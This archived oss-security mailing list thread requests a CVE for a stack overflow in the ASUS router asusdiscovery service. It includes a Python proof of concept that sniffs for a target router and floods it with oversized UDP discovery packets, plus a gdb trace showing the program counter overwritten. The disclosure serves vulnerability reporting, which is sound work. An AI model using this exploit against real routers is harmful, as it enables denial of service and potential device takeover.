Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 18 Jul 2017 13:58:04 +0800
From: varsleak <varsleak@...il.com>
To: Zach W <kestrel@...linux.us>, oss-security@...ts.openwall.com
Subject: Re: CVE-IDs request for ASUS wiress router Remote
 Command/Code Execution Vulnerability

Use CVE-2017-11420.

On 07/14/2017 10:51, varsleak wrote:
> They are of course different, CVE-2017-6548 vulnerability code is
> located in the networkmap service routine, and I found the vulnerability
> in the asusdiscorvery service program.
> 
> 在 2017年07月14日 02:39, Zach W 写道:
>> How is this different from CVE-2017-6548?
>>
>> Zach W.
>>
>>
>> On 7/12/17 7:57 PM, varsleak wrote:
>>> Hello, I review the source of asuswrt-merlin and found a Remote
>>> Command/Code Execution, the detail as follows:
>>>
>>>
>>> 1. Vulnerability Details
>>>      Affected Vendor:RT-AC5300,RT_AC1900P,RT-AC68U,RT-AC68P,RT-AC88U,
>>>      RT-AC66U,RT-AC66U_B1,RT-AC58U,RT-AC56U,RT-AC55U,RT-AC52U,RT-AC51U,
>>>      RT-N18U,RT-N66U,RT-N56U,RT-AC3200,RT-AC3100,RT_AC1200GU,
>>>      RT_AC1200G,RT-AC1200,RT-AC53,RT-N12HP,RT-N12HP_B1,RT-N12D1,
>>>      RT-N12+,RT_N12+_PRO,RT-N16,RT-N300
>>>      and Asuswrt-Merlin(https://github.com/RMerl/asuswrt-merlin)
>>>      Affected Product: ASUS Wiress Router
>>>      Affected Version:  all the latest firmware
>>>      Platform: router
>>>      Impact: Remote Command/Code Execution
>>>      Attack vector: asusdiscorvery service
>>>
>>> 2. Vulnerability Description
>>>      When an ASUS router discovers another router device,
>>>      it does not buffer the size of all discovered devices
>>>      when it is added to the device list to cause a stack overflow,
>>>      resulting in a remote code/command execution vulnerability.
>>>      The vulnerability code is as follows:
>>>
>>> https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/networkmap/ASUS_Discovery.c#L184-L202
>>>
>>> 3. PoC:
>>> <<<EOF
>>> # coding=utf-8
>>>
>>> import time
>>> import socket
>>> import sys
>>> import os
>>> import threading
>>> import struct
>>> import random
>>> import time
>>> ''' Please run PoC first, and it must run on windows '''
>>> class ASUSDiscoveryBufferOverflow:
>>> 	""" set remote host and remote port to use exp """
>>> 	def __init__(self, RHOST, RPORT, LHOST):
>>> 		self.RHOST = RHOST
>>> 		self.RPORT = RPORT
>>> 		self.LHOST = LHOST
>>> 	
>>> 	def exploit(self):
>>> 		""" execute exploit """
>>> 		self.searchDevice()
>>> 		self.sentShellCode()
>>> 		
>>> 	def searchDevice(self, socket_prot = socket.IPPROTO_UDP):
>>> 		""" search ASUS Discovery packet """
>>> 		print("    [-] try to search ASUS Discovery packet")
>>> 		while(True):
>>> 			sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_prot)
>>> 			sniffer.bind((self.LHOST, 0))
>>> 			sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
>>> 			if os.name == 'nt':
>>> 				sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
>>>
>>> 			pkt, hosts = sniffer.recvfrom(65565)
>>> 			
>>> 			if self.RHOST == hosts[0] and '\x11' == pkt[9]:
>>> 				if (pkt[28] == '\x0C' and
>>> 				pkt[29] == '\x15' and
>>> 				pkt[30] == '\x1F' ):
>>> 					print("    [+] bingo!")
>>> 					break
>>>
>>> 	def sentShellCode(self):
>>> 		s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
>>> 		
>>> 		for i in range(15):
>>> 			s.sendto(self.makeShellCode(), (self.RHOST, self.RPORT))
>>> 			print(" [-] sent %d cycle" % (i + 1))
>>> 			time.sleep(0.2)
>>> 	
>>> 	def generatingRandomMacAddr(self):
>>> 		tmp1 = random.randint(0, 0xff)
>>> 		tmp2 = random.randint(0, 0xff)
>>> 		tmp3 = random.randint(0, 0xff)
>>> 		tmp4 = random.randint(0, 0xff)
>>> 		tmp5 = random.randint(0, 0xff)
>>> 		tmp6 = random.randint(0, 0xff)
>>> 		return struct.pack('6B', \
>>> 			tmp1, tmp2, tmp3, tmp4, tmp5, tmp6)
>>> 			
>>> 	def makeShellCode(self):	
>>> 		shellcode = "\x0c\x16\x1f\x00" # HEADER [ PLEASE NOT MODIFY ]
>>> 		shellcode += (128 * b'A') # PKT_GET_INFO.PrinterInfo
>>> 		shellcode += (32 * b'A')  # PKT_GET_INFO.SSID
>>> 		shellcode += (32 * b'A')  # PKT_GET_INFO.NetMask
>>> 		shellcode += (32 * b'A')  # PKT_GET_INFO.ProductID
>>> 		shellcode += (16 * b'A')  # PKT_GET_INFO.FirmwareVersion
>>> 		shellcode += b'A'		 # PKT_GET_INFO.OperationMode
>>> 		shellcode += self.generatingRandomMacAddr() # PKT_GET_INFO.MacAddress	
>>> 		shellcode += (261 * b'A') #
>>>
>>> 		return shellcode
>>> 		
>>> def main():
>>> 	poc = ASUSDiscoveryBufferOverflow('192.168.2.1', 9999, '127.0.0.1')
>>> 	
>>> 	print("[+] Try to use exploit ...")
>>> 	
>>> 	poc.exploit()
>>> 	
>>> 	print("[+] use exploit sucessful.")
>>>
>>> if __name__ == '__main__':
>>> 	main()
>>> EOF;
>>>
>>> 4. gdb trace
>>> admin@...N12HP_B1:/tmp/bin# gdb /usr/sbin/asusdiscovery
>>>
>>> GNU gdb 6.8
>>> Copyright (C) 2008 Free Software Foundation, Inc.
>>> License GPLv3+: GNU GPL version 3 or later
>>> <http://gnu.org/licenses/gpl.html>
>>> This is free software: you are free to change and redistribute it.
>>> There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
>>> and "show warranty" for details.
>>> This GDB was configured as "mipsel-linux"...
>>> I'm sorry, Dave, I can't do that.  Symbol format `elf32-tradlittlemips'
>>> unknown.
>>> (gdb) r
>>> Starting program: /usr/sbin/asusdiscovery
>>>
>>> Program received signal SIGSEGV, Segmentation fault.
>>> 0x41414141 in ?? ()
>>> (gdb) info r
>>>           zero       at       v0       v1       a0       a1       a2
>>>   a3
>>>  R0   00000000 00000000 303e3134 00423a80 7fd650e8 00000001 00001000
>>> 00423a80
>>>             t0       t1       t2       t3       t4       t5       t6
>>>   t7
>>>  R8   00423000 00423000 00000581 3a31343a 41414141 2ab89124 41414141
>>> 2ab0fe10
>>>             s0       s1       s2       s3       s4       s5       s6
>>>   s7
>>>  R16  41414141 41414141 41414141 41414141 41414141 41414141 41414141
>>> 41413e41
>>>             t8       t9       k0       k1       gp       sp       s8
>>>   ra
>>>  R24  00000014 2ab6ad70 7fd65f66 00000000 0041c050 7fd65d30 41414141
>>> 41414141
>>>         status       lo       hi badvaddr    cause       pc
>>>       01009c13 0000035d 00000070 41414140 00000008 41414141
>>>           fcsr      fir  restart
>>>       00000000 00000000 00000000
>>>
>>> As we have seen, the registers s0-s8,t4,t6,ra and pc are overwritten by
>>> 0x41.
>>>
>>> Finally, with the ROP can lead to Remote Command Execution.
>>>
>>> 5. Discover
>>>     varsleak of Sichuan Silent Information Technology Co., Ltd
>>>     company website: http://www.silence.com.cn/
>>

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ